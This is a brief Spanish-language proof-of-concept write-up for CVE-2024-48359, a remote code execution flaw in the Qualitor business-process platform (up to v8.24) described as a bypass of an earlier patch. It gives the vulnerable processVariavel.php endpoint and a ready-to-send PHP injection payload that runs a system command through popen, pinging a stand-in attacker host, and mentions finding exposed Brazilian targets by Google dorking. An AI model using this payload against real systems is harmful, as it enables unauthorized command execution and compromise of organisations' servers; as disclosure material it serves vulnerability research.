
CVE-2024-48359 PoC
CVE-2024-48359 | Qualitor <= v8.24 RCE
Qualitor es una plataforma para la gestión de procesos de negocio, y este sistema está presente en varias empresas de Brasil que se pueden identificar simplemente mediante el uso de Google dorking.
Nuestro equipo identificó una vulnerabilidad en la aplicación susceptible a la ejecución remota de código (RCE), que permite la ejecución remota de comandos del sistema.
Se trata de un bypass para el parche de CVE-2023-47253.
Simplemente envíe un código PHP en la página processVariavel.php, ej.: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

https://www.linkedin.com/in/xvinicius/
https://www.linkedin.com/in/hairrison-wenning-4631a4124/